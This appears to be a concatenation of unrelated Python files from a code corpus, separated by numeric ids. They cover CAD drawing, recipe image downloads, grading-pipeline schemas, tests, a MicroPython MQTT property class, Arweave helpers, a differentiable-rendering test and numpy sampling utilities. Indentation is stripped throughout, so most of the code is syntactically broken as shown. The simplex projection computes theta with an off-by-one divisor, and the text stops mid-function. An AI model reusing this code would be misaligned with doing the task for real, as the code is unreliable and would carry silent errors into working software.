text="Live de Python",
dxfattribs={'height': 5, 'color': 5}
).set_pos((0, -10))
"""Finaliza e salva o desenho."""
# Salva o desenho em arquivo
dwg.saveas(filename='exemplo_1.dxf')
|
496775 | from os import path
import argparse
import json
import urllib
import urllib.request
import config
from utils import URL_to_filename
def load_recipes(filename):
"""Load recipes from disk as JSON
"""
with open(path.join(config.path_data, filename), 'r') as f:
recipes_raw = json.load(f)
print('{:,} recipes loaded from disk.'.format(len(recipes_raw)))
return recipes_raw
def save_picture(recipes_raw, url):
recipe = recipes_raw[url]
path_save = path.join(
config.path_img, '{}.jpg'.format(URL_to_filename(url)))
if not path.isfile(path_save):
if 'picture_link' in recipe:
link = recipe['picture_link']
if link is not None:
try:
if 'epicurious' in url:
img_url = 'https://{}'.format(link[2:])
urllib.request.urlretrieve(img_url, path_save)
else:
urllib.request.urlretrieve(link, path_save)
                except Exception:
print('Could not download image from {}'.format(link))
def main(filename, status_interval=500):
recipes_raw = load_recipes(filename=filename)
n = len(recipes_raw)
for i, r in enumerate(recipes_raw.keys()):
save_picture(recipes_raw, r)
if i % status_interval == 0:
print('Downloading image {:,} of {:,}'.format(i, n))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--filename', type=str, default='recipes_raw.json',
help='Recipe JSON file')
parser.add_argument('--status', type=int, default=50, help='Print status interval')
args = parser.parse_args()
main(args.filename, args.status)
|
496804 | course_config = {
"type": "object",
"patternProperties": {"": {"type": "array", "items": {"type": "string"}}},
}
grading_stage = {
"type": ["object", "null"],
"properties": {
"image": {"type": "string"},
"env": {"type": "object"},
"entrypoint": {"type": "array", "items": {"type": "string"}},
"networking": {"type": "boolean"},
"privileged": {"type": "boolean"},
"hostname": {"type": "string"},
"timeout": {"type": "number"},
"memory": {"type": "string"},
"logs": {"type": "boolean"},
},
"required": ["image"],
"additionalProperties": False,
}
grading_pipeline = {"type": ["array", "null"], "items": grading_stage}
grading_config = {
"type": "object",
"properties": {
"pre_processing_pipeline": grading_pipeline,
"student_pipeline": grading_pipeline,
"post_processing_pipeline": grading_pipeline,
"env": {"type": ["object", "null"]},
},
"required": ["student_pipeline"],
"additionalProperties": False,
}
ws_api_msg = {
"type": "object",
"properties": {"type": {"type": "string"}, "args": {"type": "object"}},
"required": ["type", "args"],
"additionalProperties": False,
}
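# Illustrative object that would validate against grading_config (all values made up):
#
#   {
#       "student_pipeline": [
#           {"image": "grader:latest", "timeout": 60, "networking": False}
#       ],
#       "env": {"COURSE": "cs101"},
#   }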
|
496810 | from django import forms
from djangocms_text_ckeditor.fields import HTMLFormField
class SimpleTextForm(forms.Form):
text = HTMLFormField()
|
496811 | from ota_update.main.ota_updater import OTAUpdater
def download_and_install_update_if_available():
o = OTAUpdater('url-to-your-github-project')
o.download_and_install_update_if_available('wifi-ssid', 'wifi-password')
def start():
# your custom code goes here. Something like this: ...
# from main.x import YourProject
# project = YourProject()
    # ...
    pass
def boot():
download_and_install_update_if_available()
start()
boot() |
496824 | import unittest
from unittest import mock
import tempfile
from shutil import rmtree
from os import path, getpid
from quikey.directories import AppDirectories
from quikey.qkdaemon import (
write_pid,
read_pid,
delete_pid,
ShutdownHook,
DatabaseChangeHandler,
)
class PidManagementTestCase(unittest.TestCase):
def setUp(self):
self.data = tempfile.mkdtemp()
self.config = tempfile.mkdtemp()
self.cache = tempfile.mkdtemp()
self.appDirs = AppDirectories(self.data, self.config, self.cache)
def tearDown(self):
rmtree(self.data)
rmtree(self.config)
rmtree(self.cache)
def testWritePid(self):
write_pid(self.appDirs)
self.assertTrue(path.exists(path.join(self.appDirs.cache, "quikey.pid")))
def testReadPid(self):
write_pid(self.appDirs)
p = read_pid(self.appDirs)
self.assertIsNotNone(p)
self.assertEqual(getpid(), int(p))
def testDeletePid(self):
write_pid(self.appDirs)
delete_pid(self.appDirs)
self.assertFalse(path.exists(path.join(self.appDirs.cache, "quikey.pid")))
class ShutdownHookTestCase(unittest.TestCase):
def setUp(self):
self.data = tempfile.mkdtemp()
self.config = tempfile.mkdtemp()
self.cache = tempfile.mkdtemp()
self.appDirs = AppDirectories(self.data, self.config, self.cache)
write_pid(self.appDirs)
def tearDown(self):
pass
@mock.patch("pynput.keyboard.Listener")
@mock.patch("quikey.filewatch.InotifyWatch")
def testHookCalled(self, listener, inotify):
hook = ShutdownHook(listener, inotify, self.appDirs)
hook(0, None)
listener.stop.assert_called_with()
inotify.stop.assert_called_with()
if __name__ == "__main__":
unittest.main()
|
import requests
import demistomock as demisto  # noqa: F401
from bs4 import BeautifulSoup
from CommonServerPython import *  # noqa: F401
args = demisto.args()
response = requests.get(args.get("url"))
soup = BeautifulSoup(response.content, "html.parser")
article = soup.find("article").get_text()
_, article = article.split("Phishing Email Campaign", 1)
article = article.replace('[.]', '.')
return_results(CommandResults(readable_output=article, outputs={"http.parsedBlog": article}))
|
496854 | from swmmio.defs.constants import red, purple, lightblue, lightgreen
FLOOD_IMPACT_CATEGORIES = {
'increased_flooding': {
'fill': red,
},
'new_flooding': {
'fill': purple,
},
'decreased_flooding': {
'fill': lightblue,
},
'eliminated_flooding': {
'fill': lightgreen,
},
}
|
496865 | from mock import patch
from django.test import TestCase
from django.utils.timezone import now
from pycon.bulkemail.models import INPROGRESS, BulkEmail, UNSENT, ERROR, SENT
from pycon.bulkemail.tasks import send_bulk_emails, MAX_TIME, RETRY_INTERVAL
from pycon.bulkemail.tests.factories import BulkEmailFactory
@patch('pycon.bulkemail.models.BulkEmail.send')
class BulkEmailSendTaskTest(TestCase):
def test_nothing_to_send(self, mock_send):
# Should just return
send_bulk_emails()
self.assertEqual(0, mock_send.call_count)
def test_long_inprogress_emails(self, mock_send):
# If an email has been INPROGRESS too long, the task
# should change it to UNSENT so we can do something
# with it.
bulk = BulkEmailFactory(status=INPROGRESS, start_time=now() - 2 * MAX_TIME)
BulkEmailFactory(status=INPROGRESS, start_time=now()) # Should not retry (yet)
send_bulk_emails()
self.assertEqual(1, mock_send.call_count)
bulk2 = BulkEmail.objects.get(pk=bulk.pk)
self.assertEqual(UNSENT, bulk2.status)
self.assertEqual(1, mock_send.call_count)
def test_retry_error_emails(self, mock_send):
# After long enough, retry errored emails
BulkEmailFactory(status=ERROR, end_time=now()) # Should not retry (yet)
bulk = BulkEmailFactory(status=ERROR, end_time=now() - 2 * RETRY_INTERVAL)
send_bulk_emails()
self.assertEqual(1, mock_send.call_count)
bulk2 = BulkEmail.objects.get(pk=bulk.pk)
self.assertEqual(UNSENT, bulk2.status)
self.assertEqual(1, mock_send.call_count)
def test_call_send(self, mock_send):
# Make multiple BulkEmails, but we should only call send on
# the one with the UNSENT status.
BulkEmailFactory(status=UNSENT)
BulkEmailFactory(status=ERROR)
BulkEmailFactory(status=SENT)
BulkEmailFactory(status=INPROGRESS)
send_bulk_emails()
self.assertEqual(1, mock_send.call_count)
def test_call_exceptions(self, mock_send):
# If sending raises exceptions, we still keep going
BulkEmailFactory(status=UNSENT)
BulkEmailFactory(status=UNSENT)
mock_send.side_effect = Exception("Intentional exception during testing")
send_bulk_emails()
self.assertEqual(2, mock_send.call_count)
|
496870 | import ConfigParser
from pylease.logger import LOGME as logme # noqa
import os
import pylease.cmd
import pylease.ext
__version__ = '0.3.2'
class Pylease(object):
"""
    The main class of Pylease, which contains all the needed resources for extensions. This class is initialised once by Pylease
    as the so-called ``lizy`` object. It is passed to :class:`~pylease.cmd.Command` and :class:`~pylease.ext.Extension` instances.
Attributes:
info_container (pylease.InfoContainer): Contains information about current status of the project. Minimal information is
``name`` and ``version``.
commands (dict): A dictionary of Pylease commands, including commands defined in extensions if any. The values of the dictionary
are instances of :class:`~pylease.cmd.Command` class.
parser (argparse.ArgumentParser): The root parser of Pylease. Use this object to add command line arguments to Pylease on the
same level as ``--version`` and ``--help``.
config (dict): A dictionary representing the configuration parsed from ``setup.cfg`` defined under ``[pylease]`` section. If a
configuration value in the configuration file is defined as ``key1 = valA, valB, valC`` then the value of the ``key1`` key of
            this attribute will be an instance of :class:`~list` and be equal to ``['valA', 'valB', 'valC']``.
"""
def __init__(self, parser, cmd_subparsers, info_container):
super(Pylease, self).__init__()
self.parser = parser
self.cmd_subparsers = cmd_subparsers
self.info_container = info_container
self.commands = {}
config = {}
config_parser = ConfigParser.SafeConfigParser()
try:
if os.path.exists('setup.cfg'):
config_parser.read('setup.cfg')
items = config_parser.items('pylease')
for item in items:
config[item[0]] = item[1]
except ConfigParser.NoSectionError:
logme.warn('No pylease section found in setup.cfg')
self.config = config
self._load_extensions()
def add_command(self, name, command):
self.commands[name] = command
def execute_command(self, name, args):
return self.commands[name](args)
def add_subparser(self, *args, **kwargs):
return self.cmd_subparsers.add_parser(*args, **kwargs)
def _get_config_list_value(self, key):
values = None
if key in self.config:
values_str_list = self.config[key].replace(' ', '')
values = values_str_list.split(',')
return values
def get_version_files(self):
return self._get_config_list_value('version-files')
def get_plugins(self):
return self._get_config_list_value('use-plugins') or []
def _load_extensions(self):
extension_packages = self.get_plugins()
for package in extension_packages:
__import__(package)
class InfoContainer(object):
# pylint: disable=too-few-public-methods
"""
A simple container that maps a provided dictionary to its attributes. This provides the current status of the project,
and the minimal built-in information attributes are the following:
Attributes:
name (str): The name of the project.
        version (str): The current version of the project.
is_empty (bool): The status of current working directory, i.e. indicates whether it is empty or not.
"""
def __init__(self):
super(InfoContainer, self).__init__()
self.name = None
self.version = None
self.is_empty = False
def set_info(self, **kwargs):
"""
Used to extend the information about the project.
Example:
Below are two options on how to use/extend the ``InfoContainer``::
info = InfoContainer()
# Option 1
info.set_info(info1='value2', info2='value2')
# Option 2
more_info = {'info3': 'value3'}
info.set_info(**more_info)
# Then you can access your info as instance attributes
print(info.info2) # will print 'value2'
"""
for key in kwargs:
setattr(self, key, kwargs[key])
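# Illustrative setup.cfg section that would be parsed into ``Pylease.config``
# (values are made up):
#
#   [pylease]
#   version-files = setup.py, mypkg/__init__.py
#   use-plugins = my_pylease_plugin
#
# With this, get_version_files() returns ['setup.py', 'mypkg/__init__.py'] and
# get_plugins() returns ['my_pylease_plugin'].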
|
496917 | import hashlib
from Crypto.Signature import PKCS1_PSS
from Crypto.Hash import SHA256
from jose import jwk
from jose.utils import base64url_encode, base64url_decode, base64
def create_tag(name, value, v2):
if v2:
b64name = name
b64value = value
else:
b64name = base64url_encode(name.encode('ascii')).decode()
b64value = base64url_encode(value.encode('ascii')).decode()
return {"name": b64name, "value": b64value}
def encode_tag(tag):
b64name = base64url_encode(tag['name'].encode('ascii')).decode()
b64value = base64url_encode(tag['value'].encode('ascii')).decode()
return {"name": b64name, "value": b64value}
def decode_tag(tag):
name = base64url_decode(tag['name'].encode())
value = base64url_decode(tag['value'].encode())
return {'name': name, 'value': value}
def owner_to_address(owner):
result = base64url_encode(hashlib.sha256(base64url_decode(owner.encode('ascii'))).digest()).decode()
return result
def winston_to_ar(winston_str: str) -> float:
length = len(winston_str)
if length > 12:
past_twelve = length - 12
winston_str = "{}.{}".format(winston_str[0:past_twelve], winston_str[-12:])
else:
lessthan_twelve = 12 - length
winston_str = "0.{}{}".format("0" * lessthan_twelve, winston_str)
return float(winston_str)
def ar_to_winston(ar_amount: str) -> str:
return str(int(float(ar_amount) * 10**12))
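# Illustrative conversions (1 AR = 10**12 winston):
#   winston_to_ar("1000000000000") -> 1.0
#   ar_to_winston("0.5") -> "500000000000"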
def concat_buffers(buffers):
total_length = 0
for buffer in buffers:
total_length += len(buffer)
offset = 0
temp = b'\x00' * total_length
temp = bytearray(temp)
for buffer in buffers:
for i in range(len(buffer)):
temp[i + offset] = buffer[i]
offset += len(buffer)
return bytes(temp)
|
496961 | import mock
from twindb_backup.share import share
@mock.patch('twindb_backup.share.print')
# @mock.patch('twindb_backup.share.get_destination')
def test_share_backup_cli(mock_print):
mock_config = mock.Mock()
mock_config.get.return_value = "/foo/bar"
mock_dst = mock.Mock()
mock_dst.remote_path = '/foo/bar'
mock_config.destination.return_value = mock_dst
mock_dst.find_files.return_value = ["/foo/bar1", "/foo/bar"]
share(mock_config, "/foo/bar")
mock_print.assert_called_once()
mock_dst.share.assert_called_once_with("/foo/bar")
mock_config.destination.assert_called_once_with()
|
496973 | import os
from dlocr.densenet.core import DenseNetOCR
from dlocr.densenet.data_loader import load_dict
default_densenet_weight_path = os.path.join(os.getcwd(), os.path.dirname(__file__),
"../weights/weights-densent-init.hdf5")
default_densenet_config_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../config/densent-default.json")
default_dict_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../dictionary/char_std_5990.txt")
__densenet = None
def get_or_create(densenet_config_path=default_densenet_config_path,
densenet_weight_path=default_densenet_weight_path):
global __densenet
if __densenet is None:
config = DenseNetOCR.load_config(densenet_config_path)
__densenet = DenseNetOCR(**config, weight_path=densenet_weight_path)
return __densenet
|
496974 | import factory
from factory.fuzzy import FuzzyText
from fjord.feedback.tests import ProductFactory
from fjord.suggest.providers.trigger.models import TriggerRule
class TriggerRuleFactory(factory.DjangoModelFactory):
class Meta:
model = TriggerRule
slug = FuzzyText()
title = 'OU812'
description = 'Oh, you ate one, too?'
url = 'https://wiki.mozilla.org/Firefox/Input'
is_enabled = True
@factory.post_generation
def products(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for product in extracted:
self.products.add(product)
|
496980 | import pytest # noqa
import requests
import json
import gevent
from eth_utils import is_same_address
from microraiden.constants import API_PATH
from microraiden.proxy.paywalled_proxy import PaywalledProxy
def test_resources(doggo_proxy, api_endpoint_address, users_db):
auth_credentials = ('<PASSWORD>', 'password')
users_db.add_user(auth_credentials[0], auth_credentials[1])
users_db.token_expiry_seconds = 0.5
api_path = "http://" + api_endpoint_address + API_PATH
# without auth, refuse access
rv = requests.get(api_path + "/admin")
assert rv.status_code == 401
# bad login
rv = requests.get(api_path + "/login", auth=('user', '<PASSWORD>'))
assert rv.status_code == 401
# good login, we got the token
rv = requests.get(api_path + "/login", auth=auth_credentials)
assert rv.status_code == 200
json_response = json.loads(rv.text)
assert 'token' in json_response
token_credentials = (json_response['token'], '')
# use the token to login
rv = requests.get(api_path + "/admin", auth=token_credentials)
assert rv.status_code == 200
# logout with an invalid token
rv = requests.get(api_path + "/logout", auth=('invalid_token', ''))
assert rv.status_code == 401
# logout with a valid token
rv = requests.get(api_path + "/logout", auth=token_credentials)
assert rv.status_code == 200
# after logout, refuse access
rv = requests.get(api_path + "/admin", auth=token_credentials)
assert rv.status_code == 401
# TODO: test token expiration. we must set token expiry timeout somehow
# login again
rv = requests.get(api_path + "/login", auth=auth_credentials)
assert rv.status_code == 200
json_response = json.loads(rv.text)
assert 'token' in json_response
token_credentials = (json_response['token'], '')
gevent.sleep(1)
# use the token to login
rv = requests.get(api_path + "/admin", auth=token_credentials)
assert rv.status_code == 401
def test_stats(doggo_proxy: PaywalledProxy, api_endpoint_address):
api_path = "http://" + api_endpoint_address + API_PATH
rv = requests.get(api_path + "/stats")
assert rv.status_code == 200
stats = json.loads(rv.text)
assert 'balance_sum' in stats
assert 'deposit_sum' in stats
assert 'token_address' in stats
assert 'receiver_address' in stats
assert 'contract_address' in stats
assert stats['sync_block'] == doggo_proxy.channel_manager.blockchain.sync_start_block
assert is_same_address(stats['receiver_address'], doggo_proxy.channel_manager.receiver)
token_address = doggo_proxy.channel_manager.token_contract.address
assert is_same_address(stats['token_address'], token_address)
contract_address = doggo_proxy.channel_manager.channel_manager_contract.address
assert is_same_address(stats['contract_address'], contract_address)
|
497000 | import pyredner
import numpy as np
import torch
# From the test_single_triangle.py test case but with viewport
pyredner.set_use_gpu(torch.cuda.is_available())
cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]),
look_at = torch.tensor([0.0, 0.0, 0.0]),
up = torch.tensor([0.0, 1.0, 0.0]),
fov = torch.tensor([45.0]), # in degree
clip_near = 1e-2, # needs to > 0
resolution = (1024, 1024),
viewport = (200, 300, 700, 800))
mat_grey = pyredner.Material(\
diffuse_reflectance = \
torch.tensor([0.5, 0.5, 0.5], device = pyredner.get_device()))
materials = [mat_grey]
shape_triangle = pyredner.Shape(\
vertices = torch.tensor([[-1.7, 1.0, 0.0], [1.0, 1.0, 0.0], [-0.5, -1.0, 0.0]],
device = pyredner.get_device()),
indices = torch.tensor([[0, 1, 2]], dtype = torch.int32,
device = pyredner.get_device()),
uvs = None,
normals = None,
material_id = 0)
shape_light = pyredner.Shape(\
vertices = torch.tensor([[-1.0, -1.0, -7.0],
[ 1.0, -1.0, -7.0],
[-1.0, 1.0, -7.0],
[ 1.0, 1.0, -7.0]], device = pyredner.get_device()),
indices = torch.tensor([[0, 1, 2],[1, 3, 2]],
dtype = torch.int32, device = pyredner.get_device()),
uvs = None,
normals = None,
material_id = 0)
shapes = [shape_triangle, shape_light]
light = pyredner.AreaLight(shape_id = 1,
intensity = torch.tensor([20.0,20.0,20.0]))
area_lights = [light]
scene = pyredner.Scene(cam, shapes, materials, area_lights)
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 16,
max_bounces = 1)
render = pyredner.RenderFunction.apply
img = render(0, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/target.exr')
pyredner.imwrite(img.cpu(), 'results/test_viewport/target.png')
target = pyredner.imread('results/test_viewport/target.exr')
if pyredner.get_use_gpu():
target = target.cuda(device = pyredner.get_device())
# Perturb the scene, this is our initial guess.
shape_triangle.vertices = torch.tensor(\
[[-2.0,1.5,0.3], [0.9,1.2,-0.3], [-0.4,-1.4,0.2]],
device = pyredner.get_device(),
requires_grad = True) # Set requires_grad to True since we want to optimize this
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 16,
max_bounces = 1)
img = render(1, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/init.png')
diff = torch.abs(target - img)
pyredner.imwrite(diff.cpu(), 'results/test_viewport/init_diff.png')
optimizer = torch.optim.Adam([shape_triangle.vertices], lr=5e-2)
for t in range(200):
print('iteration:', t)
optimizer.zero_grad()
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 4, # We use less samples in the Adam loop.
max_bounces = 1)
img = render(t+1, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/iter_{}.png'.format(t))
loss = (img - target).pow(2).sum()
print('loss:', loss.item())
loss.backward()
print('grad:', shape_triangle.vertices.grad)
optimizer.step()
print('vertices:', shape_triangle.vertices)
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 16,
max_bounces = 1)
img = render(202, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/final.exr')
pyredner.imwrite(img.cpu(), 'results/test_viewport/final.png')
pyredner.imwrite(torch.abs(target - img).cpu(), 'results/test_viewport/final_diff.png')
from subprocess import call
call(["ffmpeg", "-framerate", "24", "-i",
"results/test_viewport/iter_%d.png", "-vb", "20M",
"results/test_viewport/out.mp4"])
|
497003 | import torch
from .base_sampler import BaseSampler
class SelectiveIoUSampler(BaseSampler):
def __init__(self, **kwargs):
pass
def _sample_pos(self, **kwargs):
raise NotImplementedError
def _sample_neg(self, **kwargs):
raise NotImplementedError
def sample(self, assign_result, bboxes, gt_bboxes, **kwargs):
pos_inds = torch.nonzero(
assign_result.gt_inds > 0).squeeze(-1).unique()
neg_inds = torch.nonzero(
assign_result.gt_inds == 0).squeeze(-1).unique()
confuse_inds = torch.nonzero(assign_result.gt_inds == -2).squeeze(-1).unique()
gt_flags = bboxes.new_zeros(bboxes.shape[0], dtype=torch.uint8)
sampling_result = SamplingResult(pos_inds, neg_inds, confuse_inds, bboxes, gt_bboxes,
assign_result, gt_flags)
return sampling_result
class SamplingResult(object):
def __init__(self, pos_inds, neg_inds, confuse_inds, bboxes, gt_bboxes, assign_result, gt_flags):
self.pos_inds = pos_inds
self.neg_inds = neg_inds
self.confuse_inds = confuse_inds
self.pos_bboxes = bboxes[pos_inds]
self.neg_bboxes = bboxes[neg_inds]
self.confuse_bboxes = bboxes[confuse_inds]
self.pos_is_gt = gt_flags[pos_inds]
self.num_gts = gt_bboxes.shape[0]
self.pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1
self.pos_gt_bboxes = gt_bboxes[self.pos_assigned_gt_inds, :]
if assign_result.labels is not None:
self.pos_gt_labels = assign_result.labels[pos_inds]
else:
self.pos_gt_labels = None
@property
def bboxes(self):
return torch.cat([self.pos_bboxes, self.neg_bboxes, self.confuse_bboxes])
|
497019 | from jsonpath_rw import parse
def get_cjson_energy(cjson):
energy = parse('properties.totalEnergy').find(cjson)
if energy:
return energy[0].value
return None
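# Example: get_cjson_energy({'properties': {'totalEnergy': -76.4}}) returns -76.4,
# and None when the key is absent.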
|
497042 | import uasyncio as asyncio
from homie.constants import STRING, T_SET, TRUE, FALSE
from homie.validator import payload_is_valid
class BaseProperty:
def __init__(
self,
id,
name=None,
settable=False,
retained=True,
unit=None,
datatype=STRING,
format=None,
default=None,
restore=True,
on_message=None,
pub_on_upd=True,
):
self._value = default
self.id = id
self.name = name
self.settable = settable
self.retained = retained
self.unit = unit
self.datatype = datatype
self.format = format
self.restore = restore
self.on_message = on_message
self.pub_on_upd = pub_on_upd
self.topic = None
self.node = None
# Keep for backward compatibility
@property
def data(self):
return self._value
# Keep for backward compatibility
@data.setter
def data(self, value):
self.value = value
@property
def value(self):
return self._value
@value.setter
def value(self, value):
"""Assign new value if changed or self.pub_on_upd is True and publish to mqtt"""
if value != self._value:
self._value = value
self.publish()
elif self.pub_on_upd:
self.publish()
def set_topic(self):
self.topic = "{}/{}/{}".format(
self.node.device.dtopic,
self.node.id,
self.id
)
def publish(self):
if self._value is None:
return
asyncio.create_task(
self.node.device.publish(
self.topic,
self.value,
self.retained
)
)
async def subscribe(self):
# Restore from topic with retained message on device start
if self.restore and self.node.device.first_start is True:
self.node.device.callback_topics[self.topic] = self.restore_handler
await self.node.device.subscribe(self.topic)
# Subscribe to settable (/set) topics
if self.settable is True:
topic = "{}/set".format(self.topic)
self.node.device.callback_topics[topic] = self.message_handler
await self.node.device.subscribe(topic)
def restore_handler(self, topic, payload, retained):
""" Gets called when the property should be restored from mqtt """
# Retained messages are not allowed on /set topics
if topic.endswith(T_SET):
return
# Unsubscribe from topic and remove the callback handler
asyncio.create_task(self.node.device.unsubscribe(topic))
del self.node.device.callback_topics[topic]
if payload_is_valid(self, payload):
if payload != self._value:
if self.on_message:
self.on_message(topic, payload, retained)
self._value = payload
def message_handler(self, topic, payload, retained):
""" Gets called when the property receive a message on /set topic """
        # No retained messages allowed on /set topics
if retained:
return
if payload_is_valid(self, payload):
if self.on_message:
self.on_message(topic, payload, retained)
self.value = payload
async def publish_properties(self):
topic = self.topic
publish = self.node.device.publish
await publish("{}/$name".format(topic), self.name)
await publish("{}/$datatype".format(topic), self.datatype)
if self.format is not None:
await publish("{}/$format".format(topic), self.format)
if self.settable is True:
await publish("{}/$settable".format(topic), TRUE)
if self.retained is False:
await publish("{}/$retained".format(topic), FALSE)
if self.unit is not None:
await publish("{}/$unit".format(topic), self.unit)
HomieProperty = BaseProperty
# Keep for backward compatibility
HomieNodeProperty = BaseProperty
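# Editorial sketch (not part of the original module): constructing a settable
# property. The id/name/unit values are made up, and wiring the property to a
# node and device is assumed to follow the usual homie-micropython setup.
def _example_property():
    return HomieProperty(
        id="temperature",
        name="Temperature",
        datatype=STRING,
        unit="C",
        settable=True,
        default="21.5",
    )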
|
497075 | import numpy
import scipy.stats
import math
def one_hot(array, N):
"""
Convert an array of numbers to an array of one-hot vectors.
:param array: classes to convert
:type array: numpy.ndarray
:param N: number of classes
:type N: int
:return: one-hot vectors
:rtype: numpy.ndarray
"""
array = array.astype(int)
assert numpy.max(array) < N
assert numpy.min(array) >= 0
one_hot = numpy.zeros((array.shape[0], N))
one_hot[numpy.arange(array.shape[0]), array] = 1
return one_hot
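# Editorial usage sketch (not part of the original module): one_hot turns a
# vector of class indices into rows with a single 1, so argmax recovers the
# original labels.
def _example_one_hot():
    labels = numpy.array([0, 2, 1])
    encoded = one_hot(labels, 3)
    assert encoded.shape == (3, 3)
    assert numpy.array_equal(encoded.argmax(axis=1), labels)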
def expand_as(array, array_as):
"""
    Expands the array with trailing singleton dimensions so it broadcasts against a reference array.
    :param array: input array
    :type array: numpy.ndarray
    :param array_as: reference array
    :type array_as: numpy.ndarray or torch.Tensor
    :return: array reshaped with singleton dimensions to match array_as
    :rtype: numpy.ndarray
"""
shape = list(array.shape)
for i in range(len(array.shape), len(array_as.shape)):
shape.append(1)
return array.reshape(shape)
def concatenate(array1, array2, axis=0):
"""
    Wrapper for numpy.concatenate that simply returns array2
    when array1 is None.
:param array1: input array or None
:type array1: mixed
:param array2: input array
:type array2: numpy.ndarray
:param axis: axis to concatenate
:type axis: int
:return: concatenated array
:rtype: numpy.ndarray
"""
assert isinstance(array2, numpy.ndarray)
if array1 is not None:
assert isinstance(array1, numpy.ndarray)
return numpy.concatenate((array1, array2), axis=axis)
else:
return array2
def exponential_norm(batch_size, dim, epsilon=1, ord=2):
"""
    Sample vectors with uniformly random directions and norms drawn from a truncated exponential distribution (scaled by epsilon).
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
truncated_normal = scipy.stats.truncexpon.rvs(1, loc=0, scale=0.9, size=(batch_size, 1))
random *= numpy.repeat(truncated_normal, axis=1, repeats=dim)
return random
def uniform_norm(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly by norm and direction separately.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
uniform = numpy.random.uniform(0, 1, (batch_size, 1)) # exponent is only difference!
random *= numpy.repeat(uniform, axis=1, repeats=dim)
return random
def uniform_ball(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly in the n-ball.
See Harman et al., On decompositional algorithms for uniform sampling from n-spheres and n-balls.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
uniform = numpy.random.uniform(0, 1, (batch_size, 1)) ** (1. / dim)
random *= numpy.repeat(uniform, axis=1, repeats=dim)
return random
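# Editorial sanity-check sketch (not part of the original module): every
# sample drawn by uniform_ball should have L2 norm at most epsilon.
def _example_uniform_ball():
    samples = uniform_ball(1000, 3, epsilon=0.5, ord=2)
    norms = numpy.linalg.norm(samples, ord=2, axis=1)
    assert norms.max() <= 0.5 + 1e-8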
def uniform_sphere(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly on the n-sphere.
See Harman et al., On decompositional algorithms for uniform sampling from n-spheres and n-balls.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
return random
def truncated_normal(size, lower=-2, upper=2):
"""
Sample from truncated normal.
See https://stackoverflow.com/questions/18441779/how-to-specify-upper-and-lower-limits-when-using-numpy-random-normal.
:param size: size of vector
:type size: [int]
:param lower: lower bound
:type lower: float
:param upper: upper bound
:type upper: float
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
return scipy.stats.truncnorm.rvs(lower, upper, size=size)
def project_simplex(v, s=1):
"""
Taken from https://gist.github.com/daien/1272551/edd95a6154106f8e28209a1c7964623ef8397246.
Compute the Euclidean projection on a positive simplex
Solves the optimisation problem (using the algorithm from [1]):
min_w 0.5 * || w - v ||_2^2 , s.t. \sum_i w_i = s, w_i >= 0
Parameters
----------
v: (n,) numpy array,
n-dimensional vector to project
s: int, optional, default: 1,
radius of the simplex
Returns
-------
w: (n,) numpy array,
Euclidean projection of v on the simplex
Notes
-----
The complexity of this algorithm is in O(n log(n)) as it involves sorting v.
Better alternatives exist for high-dimensional sparse vectors (cf. [1])
However, this implementation still easily scales to millions of dimensions.
References
----------
    [1] Efficient Projections onto the L1-Ball for Learning in High Dimensions
<NAME>, <NAME>, <NAME>, and <NAME>.
International Conference on Machine Learning (ICML 2008)
http://www.cs.berkeley.edu/~jduchi/projects/DuchiSiShCh08.pdf
"""
assert s > 0, "Radius s must be strictly positive (%d <= 0)" % s
n, = v.shape # will raise ValueError if v is not 1-D
# check if we are already on the simplex
if v.sum() == s and numpy.alltrue(v >= 0):
# best projection: itself!
return v
# get the array of cumulative sums of a sorted (decreasing) copy of v
u = numpy.sort(v)[::-1]
cssv = numpy.cumsum(u)
# get the number of > 0 components of the optimal solution
rho = numpy.nonzero(u * numpy.arange(1, n+1) > (cssv - s))[0][-1]
# compute the Lagrange multiplier associated to the simplex constraint
theta = float(cssv[rho] - s) / rho
